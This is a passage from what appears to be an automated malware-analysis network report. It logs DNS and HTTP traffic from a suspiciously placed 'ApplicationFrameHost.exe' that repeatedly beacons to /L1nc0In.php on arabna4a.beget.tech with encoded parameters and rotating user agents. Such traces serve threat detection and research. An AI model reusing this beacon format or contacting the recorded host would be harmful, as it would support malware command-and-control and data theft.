Jan 10, 2025 02:29:43.274739981 CET	80	49985	5.101.153.201	192.168.2.7
Jan 10, 2025 02:29:43.276421070 CET	49985	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:29:43.281414986 CET	80	49985	5.101.153.201	192.168.2.7
Jan 10, 2025 02:29:43.504343033 CET	80	49985	5.101.153.201	192.168.2.7
Jan 10, 2025 02:29:43.506385088 CET	49985	80	192.168.2.7	5.101.153.201

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 02:27:21.978646994 CET	55229	53	192.168.2.7	1.1.1.1
Jan 10, 2025 02:27:22.194334984 CET	53	55229	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 02:27:21.978646994 CET	192.168.2.7	1.1.1.1	0x99fc	Standard query (0)	arabna4a.beget.tech	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 02:27:22.194334984 CET	1.1.1.1	192.168.2.7	0x99fc	No error (0)	arabna4a.beget.tech		5.101.153.201	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

arabna4a.beget.tech

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49743	5.101.153.201	80	8268	C:\Users\user\Music\ApplicationFrameHost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 02:27:22.319010973 CET	464	OUT	GET /L1nc0In.php?BbgPmrREGT0y5DQp73CC1=ZUJgx0hpXQufn9IoPZ0hIbOJQ8t&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&BbgPmrREGT0y5DQp73CC1=ZUJgx0hpXQufn9IoPZ0hIbOJQ8t HTTP/1.1 Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: arabna4a.beget.tech Connection: Keep-Alive
Jan 10, 2025 02:27:23.020320892 CET	546	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Fri, 10 Jan 2025 01:27:22 GMT Content-Type: text/html Content-Length: 274 Last-Modified: Wed, 11 Dec 2024 08:33:48 GMT Connection: keep-alive Keep-Alive: timeout=30 ETag: "67594e6c-112" Accept-Ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 73 65 74 5f 63 6f 6f 6b 69 65 28 29 7b 76 61 72 20 6e 6f 77 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 74 69 6d 65 20 3d 20 6e 6f 77 2e 67 65 74 54 69 6d 65 28 29 3b 74 69 6d 65 20 2b 3d 20 31 39 33 36 30 30 30 30 20 2a 20 31 30 30 30 3b 6e 6f 77 2e 73 65 74 54 69 6d 65 28 74 69 6d 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 27 62 65 67 65 74 3d 62 65 67 65 74 6f 6b 27 2b 27 3b 20 65 78 70 69 72 65 73 3d 27 2b 6e 6f 77 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 2b 27 3b 20 70 61 74 68 3d 2f 27 3b 7d 73 65 74 5f 63 6f 6f 6b 69 65 28 29 3b 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><script>function set_cookie(){var now = new Date();var time = now.getTime();time += 19360000 * 1000;now.setTime(time);document.cookie='beget=begetok'+'; expires='+now.toGMTString()+'; path=/';}set_cookie();location.reload();;</script></head><body></body></html>
Jan 10, 2025 02:27:23.151259899 CET	440	OUT	GET /L1nc0In.php?BbgPmrREGT0y5DQp73CC1=ZUJgx0hpXQufn9IoPZ0hIbOJQ8t&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&BbgPmrREGT0y5DQp73CC1=ZUJgx0hpXQufn9IoPZ0hIbOJQ8t HTTP/1.1 Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: arabna4a.beget.tech
Jan 10, 2025 02:27:23.373065948 CET	546	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Fri, 10 Jan 2025 01:27:23 GMT Content-Type: text/html Content-Length: 274 Last-Modified: Wed, 11 Dec 2024 08:33:48 GMT Connection: keep-alive Keep-Alive: timeout=30 ETag: "67594e6c-112" Accept-Ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 73 65 74 5f 63 6f 6f 6b 69 65 28 29 7b 76 61 72 20 6e 6f 77 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 74 69 6d 65 20 3d 20 6e 6f 77 2e 67 65 74 54 69 6d 65 28 29 3b 74 69 6d 65 20 2b 3d 20 31 39 33 36 30 30 30 30 20 2a 20 31 30 30 30 3b 6e 6f 77 2e 73 65 74 54 69 6d 65 28 74 69 6d 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 27 62 65 67 65 74 3d 62 65 67 65 74 6f 6b 27 2b 27 3b 20 65 78 70 69 72 65 73 3d 27 2b 6e 6f 77 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 2b 27 3b 20 70 61 74 68 3d 2f 27 3b 7d 73 65 74 5f 63 6f 6f 6b 69 65 28 29 3b 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><script>function set_cookie(){var now = new Date();var time = now.getTime();time += 19360000 * 1000;now.setTime(time);document.cookie='beget=begetok'+'; expires='+now.toGMTString()+'; path=/';}set_cookie();location.reload();;</script></head><body></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.7	49896	5.101.153.201	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 02:27:50.459189892 CET	474	OUT	GET /L1nc0In.php?WKvP6A2Jn=stWSjLwNRGLKoK&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&WKvP6A2Jn=stWSjLwNRGLKoK HTTP/1.1 Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: arabna4a.beget.tech Connection: Keep-Alive
Jan 10, 2025 02:27:51.175741911 CET	546	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Fri, 10 Jan 2025 01:27:51 GMT Content-Type: text/html Content-Length: 274 Last-Modified: Wed, 11 Dec 2024 08:33:48 GMT Connection: keep-alive Keep-Alive: timeout=30 ETag: "67594e6c-112" Accept-Ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 73 65 74 5f 63 6f 6f 6b 69 65 28 29 7b 76 61 72 20 6e 6f 77 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 74 69 6d 65 20 3d 20 6e 6f 77 2e 67 65 74 54 69 6d 65 28 29 3b 74 69 6d 65 20 2b 3d 20 31 39 33 36 30 30 30 30 20 2a 20 31 30 30 30 3b 6e 6f 77 2e 73 65 74 54 69 6d 65 28 74 69 6d 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 27 62 65 67 65 74 3d 62 65 67 65 74 6f 6b 27 2b 27 3b 20 65 78 70 69 72 65 73 3d 27 2b 6e 6f 77 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 2b 27 3b 20 70 61 74 68 3d 2f 27 3b 7d 73 65 74 5f 63 6f 6f 6b 69 65 28 29 3b 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><script>function set_cookie(){var now = new Date();var time = now.getTime();time += 19360000 * 1000;now.setTime(time);document.cookie='beget=begetok'+'; expires='+now.toGMTString()+'; path=/';}set_cookie();location.reload();;</script></head><body></body></html>
Jan 10, 2025 02:27:51.177584887 CET	450	OUT	GET /L1nc0In.php?WKvP6A2Jn=stWSjLwNRGLKoK&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&WKvP6A2Jn=stWSjLwNRGLKoK HTTP/1.1 Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: arabna4a.beget.tech
Jan 10, 2025 02:27:51.401977062 CET	546	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Fri, 10 Jan 2025 01:27:51 GMT Content-Type: text/html Content-Length: 274 Last-Modified: Wed, 11 Dec 2024 08:33:48 GMT Connection: keep-alive Keep-Alive: timeout=30 ETag: "67594e6c-112" Accept-Ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 73 65 74 5f 63 6f 6f 6b 69 65 28 29 7b 76 61 72 20 6e 6f 77 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 74 69 6d 65 20 3d 20 6e 6f 77 2e 67 65 74 54 69 6d 65 28 29 3b 74 69 6d 65 20 2b 3d 20 31 39 33 36 30 30 30 30 20 2a 20 31 30 30 30 3b 6e 6f 77 2e 73 65 74 54 69 6d 65 28 74 69 6d 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 27 62 65 67 65 74 3d 62 65 67 65 74 6f 6b 27 2b 27 3b 20 65 78 70 69 72 65 73 3d 27 2b 6e 6f 77 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 2b 27 3b 20 70 61 74 68 3d 2f 27 3b 7d 73 65 74 5f 63 6f 6f 6b 69 65 28 29 3b 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><script>function set_cookie(){var now = new Date();var time = now.getTime();time += 19360000 * 1000;now.setTime(time);document.cookie='beget=begetok'+'; expires='+now.toGMTString()+'; path=/';}set_cookie();location.reload();;</script></head><body></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.7	49957	5.101.153.201	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 02:28:03.127602100 CET	615	OUT	GET /L1nc0In.php?VP=Y0sUyEySXbH7qzhU&uKbMX6B06ERe3aQWDvs=Bo&ams92FdC1fIRKyQB4rd2=hxdB0kmEyUiFiAjo6IucBZ8uJFiwtyT&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&VP=Y0sUyEySXbH7qzhU&uKbMX6B06ERe3aQWDvs=Bo&ams92FdC1fIRKyQB4rd2=hxdB0kmEyUiFiAjo6IucBZ8uJFiwtyT HTTP/1.1 Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: arabna4a.beget.tech Connection: Keep-Alive
Jan 10, 2025 02:28:03.845150948 CET	546	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Fri, 10 Jan 2025 01:28:03 GMT Content-Type: text/html Content-Length: 274 Last-Modified: Wed, 11 Dec 2024 08:33:48 GMT Connection: keep-alive Keep-Alive: timeout=30 ETag: "67594e6c-112" Accept-Ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 73 65 74 5f 63 6f 6f 6b 69 65 28 29 7b 76 61 72 20 6e 6f 77 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 74 69 6d 65 20 3d 20 6e 6f 77 2e 67 65 74 54 69 6d 65 28 29 3b 74 69 6d 65 20 2b 3d 20 31 39 33 36 30 30 30 30 20 2a 20 31 30 30 30 3b 6e 6f 77 2e 73 65 74 54 69 6d 65 28 74 69 6d 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 27 62 65 67 65 74 3d 62 65 67 65 74 6f 6b 27 2b 27 3b 20 65 78 70 69 72 65 73 3d 27 2b 6e 6f 77 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 2b 27 3b 20 70 61 74 68 3d 2f 27 3b 7d 73 65 74 5f 63 6f 6f 6b 69 65 28 29 3b 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><script>function set_cookie(){var now = new Date();var time = now.getTime();time += 19360000 * 1000;now.setTime(time);document.cookie='beget=begetok'+'; expires='+now.toGMTString()+'; path=/';}set_cookie();location.reload();;</script></head><body></body></html>
Jan 10, 2025 02:28:03.995207071 CET	591	OUT	GET /L1nc0In.php?VP=Y0sUyEySXbH7qzhU&uKbMX6B06ERe3aQWDvs=Bo&ams92FdC1fIRKyQB4rd2=hxdB0kmEyUiFiAjo6IucBZ8uJFiwtyT&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&VP=Y0sUyEySXbH7qzhU&uKbMX6B06ERe3aQWDvs=Bo&ams92FdC1fIRKyQB4rd2=hxdB0kmEyUiFiAjo6IucBZ8uJFiwtyT HTTP/1.1 Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: arabna4a.beget.tech
Jan 10, 2025 02:28:04.221096039 CET	546	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Fri, 10 Jan 2025 01:28:04 GMT Content-Type: text/html Content-Length: 274 Last-Modified: Wed, 11 Dec 2024 08:33:48 GMT Connection: keep-alive Keep-Alive: timeout=30 ETag: "67594e6c-112" Accept-Ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 73 65 74 5f 63 6f 6f 6b 69 65 28 29 7b 76 61 72 20 6e 6f 77 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 74 69 6d 65 20 3d 20 6e 6f 77 2e 67 65 74 54 69 6d 65 28 29 3b 74 69 6d 65 20 2b 3d 20 31 39 33 36 30 30 30 30 20 2a 20 31 30 30 30 3b 6e 6f 77 2e 73 65 74 54 69 6d 65 28 74 69 6d 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 27 62 65 67 65 74 3d 62 65 67 65 74 6f 6b 27 2b 27 3b 20 65 78 70 69 72 65 73 3d 27 2b 6e 6f 77 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 2b 27 3b 20 70 61 74 68 3d 2f 27 3b 7d 73 65 74 5f 63 6f 6f 6b 69 65 28 29 3b 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><script>function set_cookie(){var now = new Date();var time = now.getTime();time += 19360000 * 1000;now.setTime(time);document.cookie='beget=begetok'+'; expires='+now.toGMTString()+'; path=/';}set_cookie();location.reload();;</script></head><body></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.7	49979	5.101.153.201	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 02:28:12.407350063 CET	516	OUT	GET /L1nc0In.php?ouI9hzqbhep5GUmX0eUaWez4Lojvj=luzWjVi&AAhu=RU&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&ouI9hzqbhep5GUmX0eUaWez4Lojvj=luzWjVi&AAhu=RU HTTP/1.1 Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: arabna4a.beget.tech Connection: Keep-Alive
Jan 10, 2025 02:28:13.105777025 CET	546	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Fri, 10 Jan 2025 01:28:12 GMT Content-Type: text/html Content-Length: 274 Last-Modified: Wed, 11 Dec 2024 08:33:48 GMT Connection: keep-alive Keep-Alive: timeout=30 ETag: "67594e6c-112" Accept-Ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 73 65 74 5f 63 6f 6f 6b 69 65 28 29 7b 76 61 72 20 6e 6f 77 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 74 69 6d 65 20 3d 20 6e 6f 77 2e 67 65 74 54 69 6d 65 28 29 3b 74 69 6d 65 20 2b 3d 20 31 39 33 36 30 30 30 30 20 2a 20 31 30 30 30 3b 6e 6f 77 2e 73 65 74 54 69 6d 65 28 74 69 6d 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 27 62 65 67 65 74 3d 62 65 67 65 74 6f 6b 27 2b 27 3b 20 65 78 70 69 72 65 73 3d 27 2b 6e 6f 77 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 2b 27 3b 20 70 61 74 68 3d 2f 27 3b 7d 73 65 74 5f 63 6f 6f 6b 69 65 28 29 3b 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><script>function set_cookie(){var now = new Date();var time = now.getTime();time += 19360000 * 1000;now.setTime(time);document.cookie='beget=begetok'+'; expires='+now.toGMTString()+'; path=/';}set_cookie();location.reload();;</script></head><body></body></html>
Jan 10, 2025 02:28:13.109275103 CET	492	OUT	GET /L1nc0In.php?ouI9hzqbhep5GUmX0eUaWez4Lojvj=luzWjVi&AAhu=RU&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&ouI9hzqbhep5GUmX0eUaWez4Lojvj=luzWjVi&AAhu=RU HTTP/1.1 Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: arabna4a.beget.tech
Jan 10, 2025 02:28:13.330416918 CET	546	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Fri, 10 Jan 2025 01:28:13 GMT Content-Type: text/html Content-Length: 274 Last-Modified: Wed, 11 Dec 2024 08:33:48 GMT Connection: keep-alive Keep-Alive: timeout=30 ETag: "67594e6c-112" Accept-Ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 73 65 74 5f 63 6f 6f 6b 69 65 28 29 7b 76 61 72 20 6e 6f 77 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 74 69 6d 65 20 3d 20 6e 6f 77 2e 67 65 74 54 69 6d 65 28 29 3b 74 69 6d 65 20 2b 3d 20 31 39 33 36 30 30 30 30 20 2a 20 31 30 30 30 3b 6e 6f 77 2e 73 65 74 54 69 6d 65 28 74 69 6d 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 27 62 65 67 65 74 3d 62 65 67 65 74 6f 6b 27 2b 27 3b 20 65 78 70 69 72 65 73 3d 27 2b 6e 6f 77 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 2b 27 3b 20 70 61 74 68 3d 2f 27 3b 7d 73 65 74 5f 63 6f 6f 6b 69 65 28 29 3b 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><script>function set_cookie(){var now = new Date();var time = now.getTime();time += 19360000 * 1000;now.setTime(time);document.cookie='beget=begetok'+'; expires='+now.toGMTString()+'; path=/';}set_cookie();location.reload();;</script></head><body></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.7	49980	5.101.153.201	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 02:28:21.227700949 CET	501	OUT	GET /L1nc0In.php?XuV9nTU0UPEK42MPVtkxIO=l5DIGMVlApaiv&UwLFN=he96MM2hRMugIXuEkLNo8nEf&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&XuV9nTU0UPEK42MPVtkxIO=l5DIGMVlApaiv&UwLFN=he96MM2hRMugIXuEkLNo8nEf HTTP/1.1 Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: arabna4a.beget.tech Connection: Keep-Alive
Jan 10, 2025 02:28:21.925947905 CET	546	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Fri, 10 Jan 2025 01:28:21 GMT Content-Type: text/html Content-Length: 274 Last-Modified: Wed, 11 Dec 2024 08:33:48 GMT Connection: keep-alive Keep-Alive: timeout=30 ETag: "67594e6c-112" Accept-Ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 73 65 74 5f 63 6f 6f 6b 69 65 28 29 7b 76 61 72 20 6e 6f 77 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 74 69 6d 65 20 3d 20 6e 6f 77 2e 67 65 74 54 69 6d 65 28 29 3b 74 69 6d 65 20 2b 3d 20 31 39 33 36 30 30 30 30 20 2a 20 31 30 30 30 3b 6e 6f 77 2e 73 65 74 54 69 6d 65 28 74 69 6d 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 27 62 65 67 65 74 3d 62 65 67 65 74 6f 6b 27 2b 27 3b 20 65 78 70 69 72 65 73 3d 27 2b 6e 6f 77 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 2b 27 3b 20 70 61 74 68 3d 2f 27 3b 7d 73 65 74 5f 63 6f 6f 6b 69 65 28 29 3b 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><script>function set_cookie(){var now = new Date();var time = now.getTime();time += 19360000 * 1000;now.setTime(time);document.cookie='beget=begetok'+'; expires='+now.toGMTString()+'; path=/';}set_cookie();location.reload();;</script></head><body></body></html>
Jan 10, 2025 02:28:21.932831049 CET	477	OUT	GET /L1nc0In.php?XuV9nTU0UPEK42MPVtkxIO=l5DIGMVlApaiv&UwLFN=he96MM2hRMugIXuEkLNo8nEf&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&XuV9nTU0UPEK42MPVtkxIO=l5DIGMVlApaiv&UwLFN=he96MM2hRMugIXuEkLNo8nEf HTTP/1.1 Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: arabna4a.beget.tech
Jan 10, 2025 02:28:22.153879881 CET	546	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Fri, 10 Jan 2025 01:28:21 GMT Content-Type: text/html Content-Length: 274 Last-Modified: Wed, 11 Dec 2024 08:33:48 GMT Connection: keep-alive Keep-Alive: timeout=30 ETag: "67594e6c-112" Accept-Ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 73 65 74 5f 63 6f 6f 6b 69 65 28 29 7b 76 61 72 20 6e 6f 77 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 74 69 6d 65 20 3d 20 6e 6f 77 2e 67 65 74 54 69 6d 65 28 29 3b 74 69 6d 65 20 2b 3d 20 31 39 33 36 30 30 30 30 20 2a 20 31 30 30 30 3b 6e 6f 77 2e 73 65 74 54 69 6d 65 28 74 69 6d 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 27 62 65 67 65 74 3d 62 65 67 65 74 6f 6b 27 2b 27 3b 20 65 78 70 69 72 65 73 3d 27 2b 6e 6f 77 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 2b 27 3b 20 70 61 74 68 3d 2f 27 3b 7d 73 65 74 5f 63 6f 6f 6b 69 65 28 29 3b 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><script>function set_cookie(){var now = new Date();var time = now.getTime();time += 19360000 * 1000;now.setTime(time);document.cookie='beget=begetok'+'; expires='+now.toGMTString()+'; path=/';}set_cookie();location.reload();;</script></head><body></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.7	49981	5.101.153.201	80

Timestamp	Bytes transferred	Direction	Data
